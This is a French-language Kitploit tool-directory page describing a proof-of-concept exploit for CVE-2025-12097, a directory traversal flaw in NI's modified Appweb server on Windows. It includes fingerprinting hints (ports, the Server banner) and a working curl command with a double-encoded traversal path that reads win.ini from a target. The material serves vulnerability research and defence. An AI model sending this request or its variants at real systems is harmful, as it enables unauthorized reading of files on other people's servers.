Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-CVE-2025-12097 — Exploit de preuve de concept pour CVE-2025-12097, une vulnérabilité de traversée de répertoire dans le serveur Appweb modifié par NI permettant la lecture arbitraire de fichiers sur les systèmes Windows. | Kitploit
Outils/GitHubGitHub/matejsmycka/poc-cve-2025-12097
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubmatejsmycka/poc-cve-2025-12097

PoC-CVE-2025-12097

Exploit de preuve de concept pour CVE-2025-12097, une vulnérabilité de traversée de répertoire dans le serveur Appweb modifié par NI permettant la lecture arbitraire de fichiers sur les systèmes Windows.

Voir le dépôt
1il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-12097

Description

La modification NI du serveur Appweb contient une vulnérabilité de traversée de répertoire qui permet à un attaquant de lire des fichiers arbitraires sur le serveur.

Le chemin URI /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini sera converti en :

pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808 ce qui est un URI valide et appweb ne bloque pas cette requête. Celle-ci est ensuite transmise à un gestionnaire personnalisé qui, dans ce cas, renvoie le contenu de tout fichier demandé.

En raison de la nature du logiciel affecté, les appareils impactés sont exclusivement des systèmes Microsoft Windows.

Version vulnérable la plus élevée observée : 12.0.0.

Identification des appareils vulnérables

Les appareils affectés peuvent être identifiés par les caractéristiques suivantes :

Pas toujours présent, mais dans la plupart des cas, le service s'exécute sur le port 3580 ; d'autres ports peuvent inclure 8080 et 80.

Réponse du serveur à /

root@kitploit:~
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126

<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>

PoC

Pour exploiter cette vulnérabilité, vous pouvez utiliser la commande suivante :

root@kitploit:~
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini

Vous verrez le contenu du fichier win.ini si la cible est vulnérable.

Télécharger l’outil